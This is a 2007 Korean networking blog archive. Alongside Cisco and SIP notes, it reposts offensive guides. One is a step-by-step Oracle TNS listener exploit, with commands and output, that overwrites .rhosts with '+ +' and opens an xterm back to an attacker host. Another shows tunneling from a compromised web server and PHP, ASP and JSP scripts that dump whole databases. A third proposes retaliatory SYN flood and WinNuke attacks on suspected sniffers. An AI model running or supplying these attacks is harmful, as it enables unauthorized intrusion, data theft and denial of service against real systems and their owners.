사실 이 정보가 새로운 것은 아닙니다. 이미 몇년 전에이슈가 제기된 적이 있죠.
http://taosecurity.blogspot.com/2005/03/cisco-routers-run-tcl-this-morning-i.html
(이 URL 에는 흥미로운 정보도 있는데 "Not only Tclsh is included in Cisco high level routers, but the their CLI part of the IOS is itself written in Tcl." 라는 문구입니다. 사실인지는 외부인인 저로서는 확인할 방법이 없군요)

라우터가 장악당하지 않도록 조심하는게 최선의 방법이지 않을까 싶습니다. PDF 자료에서는 TCL 이 포함되지 않은 IOS 버전이 Cisco 사에 있으니, 해당 버전을 사용하라고는 하지만... 안정성 염려가 있어서, 썩 내키는 방법은 아니군요.

참고 자료 :
TCL'ing Your Cisco Router
Cisco IOS Scripting with TCL(Cisco 공식 자료)

Trackbacks 0 : Comments 0

Write a comment


Sniffing 감지 툴 및 감지 기법

ⓒ Network 2007.11.27 19:31

출처 : http://micingamja.egloos.com/3965154

Sniffing 감지 툴 및 감지 기법

http://sniffdet.sourceforge.net/

내가 상용하고 있는 네트워크중에 Promiscous Mode를 사용하고 있는 NIC를 찾아는 툴인것 같다.

이런 놈이 필요하다.

MSN Sniffer 차단을 위한 가상 시나리오

최근에 사회면에 실렸던 MSN 스니퍼[1]에 대한 부정적인 측면을 생각해보고 있습니다. 그리고 sniffering을 사용한 사생활 침해를 막기 위한 가상의 역공격 시나리오를 생각해 보았습니다. 이것이 가능하려면 먼저 promiscuous mode로 동작중인 NIC의 검색이 가능해야합니다.

1. Promiscuous Mode로 동작중인 NIC 검출
이를 위한 기법으로는 크게 2가지[2]가 제시되고 있습니다.

  • reverse DNS lookup 패킷에 대한 sniffering
  • 의심가는 컴퓨터의 응답 시간 검사

reverse DNS lookup에 대한 sniffering 기법은 다음과 같이 이루어집니다. 만약 A가 B 머신(IP:123.456.789.012)의 패킷을 sniffering한다고 하겠습니다. 그러면 A는 B의 패킷을 조사한뒤 이를 다시 reverse DNS lookup합니다. 즉 IP로부터 도메인 이름을 알아내려합니다. 왜냐하면 IP보다는 도메인 명이 결과물로 A의 사용자에게 반환하기 좋으니까요. 따라서 링크된 글에서는, 아무도 모르는 PC를 설치한뒤 이 PC에서 패킷을 몇개 날렸을때 A가 이 PC에 대한 reverse DNS lookup을 한다면, 십중 팔구 sniffering중인 것으로 판단하는 기법입니다.

두번째 방법인 응답 시간 검사는, 먼저 ping등의 명령어로 의심이 가는 PC인 A 응답시간을 검사합니다. 다음, 과도한 트래픽을 일으키면서 동시에 A의 응답시간을 조사합니다. 이 때, 응답시간이 크게 지연된다면 A를 의심스럽다고 판단합니다. 주의할 점은, 이 때 A가 정말로 의심스러운가 아닌가는 알 수 없다는 점입니다. A가 정말로 다른 트래픽이 많아서 지연되고 있을 수도 있어 완전하지 못한 기법입니다.

개인적인 생각으로는 첫번째 방법 + 두번째 방법을 적용하되, 의심스러운 PC에 대한 부하가 실제로 트래픽이 일어나서 그런 것인지 혹은 promiscuous mode로 동작중이어서 그런지에 대한 판단을 역시 똑같이 network sniffering을 통해 할 수 있지 않을까 생각하고 있습니다. 또는 약간의 인공지능 방식을 적용하여 의심가는 컴퓨터의 시간대별/일자별/요일별 response time 패턴을 분석하고 이것에 크게 어긋나게 반응하는지를 응용할 수 있다고 생각합니다.

2. 역 공격 기법
sniffering을 차단하기 위해, 공격자의 NIC 를 근본적으로 차단합니다. 이와 같은 공격으로는 다음에 보인 DoS/DDoS 공격 기법[3]이 가장 효율적일 것입니다.

  • SYN Flood Attack
  • Smurf Attack (다른 PC를 공격에 가담시킨다는 점에서 바람직하지 않음)
  • Jolt2 Attack
  • WinNuke Attack

3. 역 공격 마감
공격을 깔끔하게 마감하는 것 역시 중요한 요소입니다. 주기적인 간격으로 공격을 정지하고, 상대의 sniffering 의 지속여부에 따라 역공격 지속 여부를 결정합니다. 크게 5-10분에 한번씩 지속을 판단할 수 있습니다.

References
[1] MSN Sniffer, Effetech.
http://www.effetech.com/msn-sniffer/

[2] Sniffering out Packet Sniffers,
http://www.enterprisenetworkingplanet.com/netsecur/article.php/10952_766671_2

[3] Studies of various denial-of-service tools in regard to Clavister Firewall - Clavister KB #10067
http://www.clavister.com/support/kb/10067/

Trackbacks 0 : Comments 0

Write a comment


오라클 리스너 해킹

ⓒ Network 2007.11.25 12:16

Oracle 릴리즈 7.3.4 (2.3.4), 8.0.6, 그리고 8.1.6 버전의 tnslsnr 버그를 이용한 해킹법

※ 첨부파일1: 해킹/테스트를 위한 프로그램 소스
※ 첨부파일2: 실행 프로그램

※ 사용법: (해킹시연)

1. Oracle Version을 확인

D:Project2001testtnslsnrDebug>tnscmd 101.1.1.39 1521 -v

.M.......6.........-. ..........(DESCRIPTION=(TMP=)(VSNNUM=134242304)(ERR=0)).R.
.......TNSLSNR for HPUX: Version 8.0.6.0.0 - Production..TNS for HPUX: Version 8
.0.6.0.0 - Production..Unix Domain Socket IPC NT Protocol Adaptor for HPUX: Vers
ion 8.0.6.0.0 - Production..Oracle Bequeath NT Protocol Adapter for HPUX: Versio
n 8.0.6.0.0 - Production..TCP/IP NT Protocol Adapter for HPUX: Version 8.0.6.0.0
- Production,,.........@

=> Oracle 릴리즈 7.3.4 (2.3.4), 8.0.6, 그리고 8.1.6 이면 취약한 버전임

2. Status Command로 로그파일 Path 확인

D:Project2001testtnslsnrDebug>tnscmd 101.1.1.39 1521 -t

. .......6.........5. ...........?........(DESCRIPTION=(TMP=)(VSNNUM=134242304)(
ERR=0)(ALIAS=LISTENER)(SECURITY=OFF)(VERSION=TNSLSNR for HPUX: Version 8.0.6.0.0
- Production)(START_DATE=16-MAY-01 08:20:58)(SIDNUM=1)(LOGFILE=/APP/oracle8/net
work/log/listener.log)(PRMFILE=/APP/oracle8/network/admin/listener.ora)(TRACING=
off)(UPTIME=4680755)(SNMP=OFF)).M........(SERVICE_DESC=(SID=ORAINFRA)(NUM=5)(REG
=0)(SREG=0)(GBN=ORAINFRA)),,.........@

=> 로그 파일 경로명이 /APP/oracle8/network/log/listener.log 로 설정되어 있음을 볼 수 있음

3. 로그파일을 임의의 파일로 변경

D:Project2001testtnslsnrDebug>tnscmd 101.1.1.39 1521 -l /APP/oracle8/.rhosts

.q......"..e(DESCRIPTION=(TMP=)(VSNNUM=134242304)(ERR=0)(COMMAND=log_file)(LOGFI
LENAME=/app/oracle8/.rhosts.log))

4. Status Command로 로그파일이 변경되었는지 Path 확인

D:Project2001testtnslsnrDebug>tnscmd 101.1.1.39 1521 -t
. .......6.........$. ....................(DESCRIPTION=(TMP=)(VSNNUM=134242304)(
ERR=0)(ALIAS=LISTENER)(SECURITY=OFF)(VERSION=TNSLSNR for HPUX: Version 8.0.6.0.0
- Production)(START_DATE=16-MAY-01 08:20:58)(SIDNUM=1)(LOGFILE=/APP/oracle8/.rh
osts)(PRMFILE=/APP/oracle8/network/admin/listener.ora)(TRACING=off)(UPTIME=46929
66)(SNMP=OFF)).M........(SERVICE_DESC=(SID=ORAINFRA)(NUM=5)(REG=0)(SREG=0)(GBN=O
RAINFRA)),,.........@

=> 로그 파일 경로명이 /app/oracle8/.rhosts 로 변경되어 있는 것을 볼 수 있음

5. "+ +" 을 .rhosts에 삽입

D:Project2001testtnslsnrDebug>tnscmd 101.1.1.39 1521 -i "+ +"
........"...(DESCRIPTION=(ERR=1153)(VSNNUM=134242304)(ERROR_STACK=(ERROR=(CODE=1
153)(EMFI=4)(ARGS='(CONNECT_DATA=((.+ +'))(ERROR=(CODE=303)(EMFI=1))))

(혹은 .profile에 "/usr/bin/X11/xterm -display evil_machine:0.0 &" 삽입)

6. rsh, rlogin, rexec를 통해 do something....

7. 원상복귀

D:Project2001testtnslsnrDebug>tnscmd 101.1.1.39 1521 -l /APP/oracle8/network/log/listener.log
.~......"..r(DESCRIPTION=(TMP=)(VSNNUM=134242304)(ERR=0)(COMMAND=log_file)(LOGFI
LENAME=/app/oracle8/network/log/listener.log))

8. 원상복귀 확인

D:Project2001testtnslsnrDebug>tnscmd 101.1.1.39 1521 -t
. .......6.........5. ...........?........(DESCRIPTION=(TMP=)(VSNNUM=134242304)(
ERR=0)(ALIAS=LISTENER)(SECURITY=OFF)(VERSION=TNSLSNR for HPUX: Version 8.0.6.0.0
- Production)(START_DATE=16-MAY-01 08:20:58)(SIDNUM=1)(LOGFILE=/APP/oracle8/net
work/log/listener.log)(PRMFILE=/APP/oracle8/network/admin/listener.ora)(TRACING=
off)(UPTIME=4713315)(SNMP=OFF)).M........(SERVICE_DESC=(SID=ORAINFRA)(NUM=5)(REG
=0)(SREG=0)(GBN=ORAINFRA)),,.........@

< 해결책 >

1. lsnrctl의 SET PASSWORD 명령을 사용하여 tnslsnr에 패스워드를 설정하여야 한다.

2. Oracle의 MetaLink (http://metalink.oracle.com/)로 부터 시스템에 적절한 Patch를 설치한다
(listener 프로그램에 대한 버그 번호 1361722 참조). 또한 다음 URL에서 Oracle Technology
Network에 이 문제에 대한 Security Alert!을 구할 수 있다.

http://otn.oracle.com/deploy/security/alert!s.htm
http://otn.oracle.com/deploy/security/pdf/listener_alert!.pdf

Trackbacks 0 : Comments 1
  1. Favicon of http://mm89.tistory.com BlogIcon 선문기 2016.03.30 14:11 신고 Modify/Delete Reply

    첨부파일의 내용좀 보내주실수 잇나요?? 첨부파일 내용이 안보여서요

Write a comment


오라클 해킹 자료

ⓒ Network 2007.11.25 12:10
Trackbacks 0 : Comments 0

Write a comment


[본문스크랩] [SIP] SIP proxy server + Soft phone *3 + router(NM-..

ⓒ Network 2007.11.25 09:18

[SIP] SIP proxy server + Soft phone *3 + router(NM-2V, analog phone *2) 간단 구성;;

@ 바이스러 먹은 PC로 인하여 급 라우터 빠졌습니다;;

[==========LAN===========]

PC1 PC2PC3 PC4

@ 사용한 프로그램

- SIP Proxy Server v2.0 : http://www.brekeke.com/

- SIP Client Soft Phone eyeBeam v1.5 : http://www.counterpath.com/

- VMware 6.0

@ SIP Proxy 서버 설치 ( jave runtime 1.4 버전 이상 필요 )

@ SIP Soft Phone 설치

@ eyeBeam v1.5 에서 지원하는 간단한 메시징 기능입니다;;

@ 메시지가 전달될때 해당 패킷을 캡쳐해보았습니다;; SIP(SDP 를 이용하는 것을 볼 수 있습니다)

@ 마지막으로 서버에 등록된 클라이언트입니다;;

@ 첨부파일은 위 해당 패킷의 캡쳐한 내용입니다;;

Trackbacks 0 : Comments 0

Write a comment


[본문스크랩] 웹서버 DB 해킹에 대한 궁금증해결

ⓒ Network 2007.11.25 08:50
출처 : http://blog.naver.com/zsup1343/60003844720

본 문서는 방화벽의 Private또는 DMZ에 웹서버또는 DB와 연동할 수 있는
서버를 점령 후에 어떻게 DB 서버를 해킹하는가에 대한 궁금증 해결을 위해 작성한 문서이다.

-----------------------------------------------------------------------------------------------------------------
I. 네트워크 구성도

1) 인터넷-------방화벽------- 웹서버 --------방화벽---------DB서버


2) 인터넷-------방화벽------- 웹서버
DB서버
(DMZ존)

------------------------------------------------------------------------------------------------------------------
II. 개요

본 문서에 있는 방법은 이미 다 알고 있는 내용이거나 인터넷에 찾아 보면 다 나오는 내용들이다
내용상의 틀린 부분이 있으면 지적해 주시면 감사감사~~~

Private 또는 DMZ에 위치하는 DB 서버를 해킹 하기 위해선
먼저 DB 접속 인증 id/passwd 또는 sid 를 알아야 하며 또한 웹서버를 경유하여 DB와 접속을 하여야 하므로
어떤 방법으로든 웹서버는 점령하여야 한다.
웹서버 점령에 관해서는 이 문서에서는 언급 하지 않는다.
이유는 너무나 많은 방법이 있으며 나도 그 모든 방법에 대해서 모른다.
또한 이와 같이 삽질을 안하고도 대다수의 웹서버의 temp,tmp디렉토리 또는 admin 권한으로 DB의 내용을 획득할
수도 있으나 어쩔수 없이 DB 쿼리를 해야 하는 상황에 대해서 설명한다.
물론 해당 웹서버를 직접 공격하지 않고 sql injection 공격을 할 수 있으면 아래와 같은 삽질은 하지 않아도 될것이다.

일단 방화벽 내의 웹서버를 점령한 후 DB서버를 해킹 하는 방법은 상당히 많은
방법이 있으며 dbms의 종류 웹서버의 종류 cgi의 종류에 따라 많은 조합의 공격법이 있다.

또한 DB 서버를 해킹할때 root권한 획득과 같은 방법은 별 필요가 없을 것이다.
왜냐하면 결국 DB 서버의 해킹의 목적은 DB의 내용을 획득하는 것이기 때문에 root권한이 필요가 없다.

DB를 쿼리하기 이전에 웹서버 앞의 Firewall Rule에 따라 접근개념이 틀려 질 수 있으므로
아래와 같이 크게 2가지 분류로 나누어 접근하도록 하겠다.

Firewall Rule을 파악하기 위해서 공격자의 PC에 Sniffing Tool을 설치하고 해당 웹서버에는 nc를 설치한다.
공격자의 PC에서는 해당 웹서버에서 공격자 PC로 전송되는 패킷에 대한 검사를 수행하고
해당 웹서버에서는 다음과 같이 실행한다
nc -v -w2 -z [공격자 PC IP] 1-65535
이는 해당 웹서버에서 공격자 PC로의 어떤 서비스가 통과 가능한지 파악하기 위함이다.

Firewall Rule에서 특정 서비스에 대해서만 Accept되어 있을 수 있다 예를 들어 외부로 나가는 dns또는 특정 Application의
update서비스와 같이 특정 서비스만 Accept되어 있으면 그 서비스를 판단할 수 있다.
또한 공격자의 PC에서 Sniffing을 설치하여 패킷 검사를 하는 이유는 nc는 nmap과 같이 closed와 filtered를 구분하지
못하기 때문에 수동으로 패킷을 검사하여 확인을 한다.

nc수행 결과 공격자의 PC로 한개 이상의 syn 패킷이 전송이 된다면 아래 1번 방법으로 DB 쿼리가 가능하다
2번 방법은 웹서버에서 인터넷구간으로의 Outbound Rule이 서비스 전체에 대해 Deny일 경우로
해당 웹서버의 cgi를 이용하여 DB쿼리를 수행한다.


-------------------------------------------------------------------------------------------------------------------
III. 실전 DB 해킹

1) Firewall Rule에서 Source IP가 웹서버에서 외부 인터넷구간으로의 Outbound Rule이 Accept인 경우

이는 port redirect(cevert tunnel, reverse telnet)이 가능한 상태이다.
즉 외부에서 해당 웹서버의 쉘을 띄울수가 있는 상태이므로 쉽게 DB쿼리가 가능하다.

우선 공격대상 네트워크는 아래와 같다고 가정한다.
실제 Firewall/네트워크 구성이 상당수 기업들이 이와 유사하게 설정 되어 있다.

===================================================================================================================
[공인:210.210.210.210] [공인: 220.220.220.220] [사설:192.168.0.100]
공격자 PC1 -------------------- 방화벽 ----------------- 웹서버 ------------방화벽----------------- DB 서버
Any웹서버 80 Accept웹서버 DB서버DB서비스 Accept
Any웹서버 AnyDenyAnyDB서버AnyDeny
웹서버 Any8080 Accept
웹서버 AnyAnyDeny

공격자 PC2(Proxy 서버)
[공인:210.210.210.211]
=====================================================================================================================

port redirect는 yatunnel이란 tool을 이용하여 아래와 같이 수행한다.
만일 웹서버에 sql client툴이 있을경우 이를 이용하면 쉽게 DB에 접속하여 쿼리를 할 수 있으나
경험상 아마도 없을 것이다. ^^;

- 공격자 PC2(Proxy 서버)에서의 작업
Proxy 서버측에서 웹서버와 Tunneling 할 port를 open한다.

[root@Proxy Server]# ./tun-proxy -p 12345


- 웹서버에서의 작업
tun-server의 소스를 보면 127.0.0.1:22로 redirect를 한다.
이 부분은 자신이 원하는 주소와 port를 수정하여 사용 가능하다.
즉, 다른 호스트로 redirect가 가능하다. 즉 이를 192.168.0.100:1433으로 수정한다.
MSSQL:1433, Oracle:1521, MySQL:3306

[green@Internal Server]$ ./tun-server -h 210.210.210.211 -p 12345

- 공격자 PC1 에서의 작업
각종 SQL Client를 이용하여 210.210.210.211:12345로 DB와 Connect하고 DB 쿼리를 한다.

MSSQL, MySQL, Oracle에 대한 SQL Client는 아래 사이트에 있는 SQL Gate가 사용이 용이하고 쉽다.
http://www.sqlgate.com/html/index.html

* yatunnel을 이용한 SQL Client 연결은 한번도 테스트는 해 보지 않았다
안될 이유는 없을것 이라고 판단이 되나 누군가 테스트 해 볼 기회가 된다면 안되면 연락을 주길 바란다.


2) Firewall Rule에서 Source IP가 웹서버에서 외부 인터넷구간으로의 Outbound Rule이 Deny인 경우

Outbound Rule이 Deny일 경우 순전히 해당 웹서버의 cgi를 이용하여 DB 쿼리를 하여야 한다.
이는 상당히 많은 조합이 필요하다 ㅠㅠ;
가장많이 사용되는 php, asp, jsp를 예로 들어 보겠다.

2-1) php를 사용할 경우

가장 먼저 DB Name과 Table Name을 알아야 DB 쿼리를 한다.
웹서버의 php파일들을 뒤져서 DB Name과 Table Name을 찾아 낼수 있지만 이 얼마나 노가다 인가...
그래서 아래와 같은 DB 구조 파악을 할 수 있는 php파일을 실행 시키자.
아래의 예제는 Mysql을 예로 들었다.
물론 아래의 몇몇 변수는 시스템 환경에 맞게 수정을 하여야 한다.


------------------------------------디비/테이블 알아내기---------------------------------------------
$db = mysql_connect($host, $user, $password);
mysql_select_db($database);

//전체 DB보기
$db_list = mysql_list_dbs($db);
echo "전체 DB >>>>>";
while ($row = mysql_fetch_object($db_list)) {
$database= $row->Database;
echo "$row->Database || ";
}

$table_rs = mysql_list_tables($database);////// 테이블을 볼 테이타 베이스명

echo "


";

$rows = 0;

while($tables = mysql_fetch_array($table_rs)){

$query = "select * from $tables[0]";
$field_rs = mysql_query($query, $db);

$field = mysql_fetch_field($field_rs);/////////// 필드명 구하기
$cols = mysql_num_fields($field_rs);/////////// 필드수 구하기

if($rows%5 == 0) echo "";//// 칼럼수가 5개 이면 줄 바꿈
echo "";
$rows++;
}
echo "








";

for($i=0; $i < $cols; $i++){
echo "



n";
}
echo "
$tables[0]
필드명 Type
".mysql_field_name($field_rs, $i)." ".mysql_field_type($field_rs, $i)." (".mysql_field_len($field_rs, $i).")
";
?>
-------------------------------------------------------------------------------------------------------------


-----------------------------테이블의 데이타 쿼리하기--------------------------------------------------------
// 데이타 양이 많을경우 디져버릴수 있으니 게시판 형태로 수정하여야 한다.


$connect=mysql_connect("localhost","user_id","password") ordie("Fail to connect SQL");
mysql_select_db( "database_name",$connect);

print "n";
echo("


테이블$tab_name의 모든 데이타를 가져옵니다

");
print "
";


$stmt = "SELECT * FROM $tab_name";

$nresult = mysql_query($stmt,$connect );
$nrows = mysql_affected_rows();
$results=mysql_fetch_array($nresult);

if ( $nrows > 0 ) {
print "n";
print "n";
$j=0;
while ( list( $key, $val ) = each( $results ) ) {
if ( $j%2==1) print "n";
$j++;
}
print "n";

$k=0;
for ( $k = 0; $k < $nrows; $k++ ) {
mysql_data_seek($nresult,$k);
$results=mysql_fetch_array($nresult);

$m=0;
while ( list( $key, $val ) = each( $results ) ) {
if ( $m%2==1) print "";
$m++;
} // end of while
print "";
} // end of for

print "
$key
$val
n";
} else {
echo "No data found
n";
}
print "$nrows Records Selected
n";



print " INPUT TABLE NAME ";
print "
";
print "
";
print " ";

?>
-------------------------------------------------------------------------------------------------------


------------------------------------테이블의 쿼리값을 파일로 저장---------------------------------------

$connect=mysql_connect("localhost","user_id","password") ordie("Fail to connect SQL");
mysql_select_db( "database_name",$connect);

$stmt = "select * from tablename into outfile 'filename'";
mysql_query($stmt,$connect );

?>
--------------------------------------------------------------------------------------------------------



2-2) asp 를 사용할 경우

asp를 사용한다면 90% 이상 mssql과 조합을 이루고 있을 것이다.
Mssql은 sp_maskwebtask API가 있어 상당히 편리(?)하다.
쿼리한 결과값을 화면에 출력하는 수고를 하지 않아도 된다.
이 방법은 asp에만 사용되는 방법이 아니라 해당 DBMS가 MSSQL이라면 php또는 jsp 에서도 해당 cgi에 맞게 DB Connect후
sql query만 아래와 같이 실행하면 된다.

sp_maskwebtask를 이용하여 쿼리의 결과값을 Local서버 또는 Remote서버로 html로 저장시킬 수 있다.

EXEC sp_makewebtask 'c:inetpubwwwrootsqloutput.html', 'select * from sysobjects where xtype = ''U'''
이 명령어로 sysobjects에 있는 User가 생성한 DB 테이블을 쿼리한 결과값을 c:inetpubwwwrootsqloutput.html에 저장한다.

EXEC sp_makewebtask '\10.0.0.8publichack.htmk', 'SELECT * FROM user'
또한 쿼리한 결과값을 remote에 저장시킬 수 있다.

---------------------------------------------------------------------------------------------------------
테이블 정보 알아내기
<%
set Conn = server.createobject("adodb.connection")
Conn.Open "test","sa", ""

set rs = Conn.Execute(" EXEC sp_makewebtask 'c:inetpubwwwrootsqloutput.html', 'select * from sysobjects where xtype = ''U''' ")
%>
-----------------------------------------------------------------------------------------------------------

자 이제 sales 테이블의 결과를 보자.
-----------------------------------------------------------------------------------------------------------
해당 sales 테이블의 전체 내용 쿼리하기
<%
set Conn = server.createobject("adodb.connection")
Conn.Open "test","sa", ""

set rs = Conn.Execute(" EXEC sp_makewebtask 'c:inetpubwwwrootaaa.html', 'select * from sales' ")
%>
-----------------------------------------------------------------------------------------------------------
우와 간단하고 좋다... 역시 MS...


2-3) jsp 를 사용할 경우
jsp일 경우 Windows, *nix와 같이 시스템에 상관없이 운영되기 때문에
연결한 DBMS가 MSSQL, MYSQL, Oracle, Informix 등 다양한 DBMS와 연결을 한다.

가장 많이 사용되는 MSSQL과 Oracle을 예로 들어보잣...

먼저 MSSQL은 asp를 사용할 때와 마찬가지로 sp_maskwebtask API를 사용해서 DB 쿼리를 수행할 수 있다.

---------------------------------------------------------------------------------------------------------
MSSQL 테이블 정보 알아내기
<%@ page contentType="text/html; charset=euc-kr" %>
<%@ page import="java.sql.*, java.io.*"%>

<%
String url ="jdbc:freetds:sqlserver://192.168.0.10:1433/WEBDB";
String id = "sa";
String pass = "";

Class.forName("com.microsoft.jdbc.sqlserver.SQLServerDriver");
Connection conn = DriverManager.getConnection(url,id,pass);

Statement stmt = conn.createStatement();
String sql = " EXEC sp_makewebtask 'c:inetpubwwwrootsqloutput.html', 'select * from sysobjects where xtype = ''U''' ";
ResultSet rs = stmt.executeQuery(sql);
%>
-----------------------------------------------------------------------------------------------------------

---------------------------------------------------------------------------------------------------------
MSSQL sales 테이블 쿼리하기
<%@ page contentType="text/html; charset=euc-kr" %>
<%@ page import="java.sql.*, java.io.*"%>

<%

String url ="jdbc:freetds:sqlserver://192.168.0.10:1433/WEBDB";
String id = "sa";
String pass = "";

Class.forName("com.microsoft.jdbc.sqlserver.SQLServerDriver");
Connection conn = DriverManager.getConnection(url,id,pass);

Statement stmt = conn.createStatement();
String sql = " EXEC sp_makewebtask 'c:inetpubwwwrootaaa.html', 'select * from sales' ";
ResultSet rs = stmt.executeQuery(sql);
%>
-----------------------------------------------------------------------------------------------------------


------------------------------------------------------------------------------------------------------------
Oracle 테이블 정보 알아내기

<%@ page contentType="text/html; charset=euc-kr" %>
<%@ page import="java.sql.*, java.io.*"%>
<%
Class.forName("oracle.jdbc.driver.OracleDriver");
String JDBCDriverType = "jdbc:oracle:thin";
String DBHost = "test.inzen.com";
String Port = "1521";
String SID = "ORA8";
String url = JDBCDriverType+":@"+DBHost+":"+Port+":"+SID;
String userID = "test";
String password = "test";
String query = "select * from tab";
Connect con = DriverManager.getConnection(url, userID, password);
Statement stmt = con.createStatement();
ResultSet rs = stmt.executeQuery(query);
File outputFile = new File("jsp웹루트디렉토리/oratable.txt");
FileWriter fout = new FileWriter(outputFile);
PrintWriter ps = new PrintWriter(new BufferedWriter( fout ));
while ( rs.next() ) {
ps.print ( rs.getString ( 1 ) ) ;
ps.print ( "" ) ;
ps.println ( rs.getString ( 2 ) ) ;
}
ps.close() ;
%>
---------------------------------------------------------------------------------------------------------------

위의 File outputFile 에 파일명을 지정하는데 절대 경로와 상대경로 다 쓸 수 있다.
만약 jsp 의 엔진으로 tomcat 을 사용하고 있는경우 /usr/local/jakarta-tomcat/bin 에 default 로 파일이 생성되게 된다.
그러므로 웹에서 불러 올수 있는 경로를 지정해야 한다.
/usr/local/jakarta-tomcat/webapps 의 위치가 jsp 웹루트 디렉토리라면
File outputFile = new File("/usr/local/jakarta-tomcat/webapps/oratable.txt");
이런 식으로 지정을 한다.

---------------------------------------------------------------------------------------------------------------
Oracle 특정 테이블 쿼리하기
<%@ page contentType="text/html; charset=euc-kr" %>
<%@ page import="java.sql.*, java.io.*"%>
<%
Class.forName("oracle.jdbc.driver.OracleDriver");
String JDBCDriverType = "jdbc:oracle:thin";
String DBHost = "test.inzen.com";
String Port = "1521";
String SID = "ORA8";
String url = JDBCDriverType+":@"+DBHost+":"+Port+":"+SID;
String userID = "test";
String password = "test";
String query = "select gongi, day from gongi";
Connect con = DriverManager.getConnection(url, userID, password);
Statement stmt = con.createStatement();
ResultSet rs = stmt.executeQuery(query);
File outputFile = new File("jsp웹루트디렉토리/oratable.txt");
FileWriter fout = new FileWriter(outputFile);
PrintWriter ps = new PrintWriter(new BufferedWriter( fout ));
while ( rs.next() ) {
ps.print ( rs.getString ( 1 ) ) ;
ps.print ( "" ) ;
ps.println ( rs.getString ( 2 ) ) ;
}
ps.close() ;
%>
---------------------------------------------------------------------------------------------------------------

The End

Trackbacks 0 : Comments 0

Write a comment


Reverse Traceroute and Looking Glass Servers in the World

ⓒ Network 2007.11.25 08:47

Reverse Traceroute and Looking Glass Servers in the World

http://www.caida.org/analysis/routing/reversetrace/index.xml

Trackbacks 0 : Comments 0

Write a comment


시스코 멀티서비스 및 통합 서비스 라우터의 음성 보안

ⓒ Network 2007.11.19 19:54

출처 : http://blog.naver.com/mongu2/140044861635

시스코 멀티서비스 및 통합 서비스 라우터의 음성 보안

데이터시트


시스코 멀티서비스 및 통합 서비스 라우터의 음성 보안

시스코 시스템즈 멀티서비스 및 통합 서비스 라우터 포트폴리오에서 제공하는 미디어 인증 및 암호화 기능은 음성 통화 도청을 방지 해줍니다.


음성 및 IP 커뮤니케이션 제품과 애플리케이션의 Cisco Unified Communications 시스템은 조직의 보다 효과적인 커뮤니케이션을 이끌어 비즈니스 능률을 향상시켜주고, 한 번에 올바른 자원을 찾을 수 있게 하며 수익성을 높여줍니다. Cisco Unified Communications 포트폴리오는 모든 규모의 조직을 위한 통합 솔루션인 Cisco Business Communications Solution의 핵심 구성요소입니다. Cisco Business Communications Solution에는 또한 네트워크 인프라, 보안, 네트워크 관리 제품, 무선 연결 및 라이프사이클 서비스 접근 방법과 유연한 구축, 외주 관리 옵션, 최종 사용자 및 파트너 금융 패키지, 타사 커뮤니케이션 애플리케이션 등이 포함됩니다.


제품 개요


기업들은 운영 비용 절감, 생산성 향상 및 네트워크 관리 단순화를 위해 IP 커뮤니케이션으로 전환하고 있습니다. Cisco 1700 Series에서부터 3800 Series 플랫폼까지 시스코 멀티서비스 및 통합 서비스 라우터 포트폴리오는 까다로운 엔터프라이즈 환경에 강력하고 확장 가능한 IP 커뮤니케이션 솔루션을 제공합니다.


시스코 멀티서비스 및 통합 서비스 라우터의 광범위한 음성 보안 기능은 IP 커뮤니케이션 솔루션을 구현하는 기업에 높은 수준의 보안을 제공합니다. 자가 방어 네트워크 모델에 기반한 시스코 멀티레이어 제품은 네트워크에서 시작하여 엔드포인트와 애플리케이션까지 확장됩니다. 시스코의 SAFE Blueprint는 비즈니스 네트워크 보안을 지원하기 위한 모범사례 및 툴에 대한 상세한 프레임워크를 제시합니다.


SRTP(Secure Real-Time Transport Protocol)를 사용한 미디어 암호화는 음성 대화를 암호화하여, 음성 도메인에 액세스한 내외부의 도청자 가 대화 내용을 식별할 수 없게 함으로써 보안을 유지합니다. 음성 패킷을 위해 설계된 SRTP는 IETF RFC 3711 표준으로 AES 암호화 알고리즘을 지원합니다.


시스코 라우터의 미디어 암호화 기능은 Cisco Unified CallManager 소프트웨어 및 Cisco Unified IP폰의 미디어 암호화 기능과 함께 작동하여 게이트웨이 간 통화뿐 아니라 IP폰과 게이트웨이 간 통화를 모두 보호합니다. 이것은 미디어가 연결되는 게이트웨이 인터페이스 유형에 따라 아날로그 통화, 보안 팩스 통화 또는 IP폰과 게이트웨이 간의 안전한 통화를 지원합니다. Cisco Unified CallManager에서 생성된 음성 암호화 키는 암호화된 시그널링 경로를 통해 TLS(Transport Layer Security)를 사용하여 Cisco Unified IP폰으로 안전하게 전송되고 IPSec(IP Security)보호 링크를 통해 게이트웨이로 전달됩니다.


시스코 라우터의 미디어 암호화 기능은 Advanced Enterprise Services 및 Advanced IP Services IOS Software Feature Set로 업그레이드한 Cisco IOS Software Release 12.3(11)T2에서부터 사용 가능합니다. 이러한 기능들은 PVDM2, EVM-HD, NM-HD-, AIM-VOICE 및 NM-HDV2 음성 게이트웨이 네트워크 모듈에서 사용 가능한 DSP(digital signal processing) 모듈에서 제공됩니다.


기능 표


표1은 미디어 인증 및 암호화 솔루션의 세부 내용을 표시합니다.


인증 및 암호화 기능• SRTP를 사용한 음성 RTP 스트림 미디어 암호화
• 보안 RTCP(RTP Control Protocol)를 사용한 RTCP 정보 교환
• 보안 및 비보안 엔드포인트 간 통화를 위한 SRTP-RTP 폴백
• WAN 장애 복구 시 Cisco Unified SRST(Survivable Remote Site Telephony) 모드에서 안전한 통화 지원
• SRTP를 사용한 미디어 암호화 통화에 CRTP(압축 RTP) 지원
인증 및 암호화 알고리즘• AES-128 암호화 알고리즘 지원
• HMAC 보안 해시 인증 알고리즘(SHA 1) 지원
시그널링 인증 및 암호화 기능• MGCP(Media Gateway Control Protocol) 및 H.323 게이트웨이에서 게이트웨이-Cisco Unified CallManager 시그널링 및 암호화에 IPSec 사용
• IP폰 - Cisco Unified Survivable Remote Site Telephony 라우터 시그널링 및 암호화는 TLS(Transport Layer Security) 사용
프로토콜 지원• MGCP 0.1(Cisco Unified CallManager에서 MGCP 게이트웨이 지원)
• H.323(H.323 게이트웨이 및 IPIP 게이트웨이에서 지원, Cisco Unified CallManager 상호 운용성 옵션)
• SRST 모드에서 SCCP(Cisco Unified IP Phone)
모듈 지원• PVDM 모듈: PVDM2-8, PVDM2-16, PVDM2-32, PVDM2-48, PVDM2-64
• 아날로그 음성 모듈: EVM-HD(PVDM 포함), NM-HD-1V, NM-HD-2V, NM-HD-2VE
